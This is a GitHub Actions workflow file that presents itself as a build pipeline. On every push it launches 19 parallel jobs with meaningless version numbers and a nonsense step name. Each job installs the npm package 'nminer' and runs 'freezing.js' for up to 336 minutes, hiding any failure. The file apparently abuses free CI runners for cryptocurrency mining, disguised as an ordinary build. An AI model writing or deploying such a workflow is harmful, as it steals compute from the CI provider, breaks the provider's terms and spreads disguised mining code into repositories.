name: freezing
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 85 }
          - { version: 5453 }
          - { version: 8873 }
          - { version: 1010 }
          - { version: 9966 }
          - { version: 103 }
          - { version: 4687 }
          - { version: 4161 }
          - { version: 1368 }
          - { version: 15 }
          - { version: 2160 }
          - { version: 5995 }
          - { version: 39 }
          - { version: 7964 }
          - { version: 9313 }
          - { version: 4872 }
          - { version: 8174 }
          - { version: 890 }
          - { version: 2134 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: yearly yahoo sedately
        run: |
          npm install nminer@latest
          timeout 336m node freezing.js || echo "freezing executed"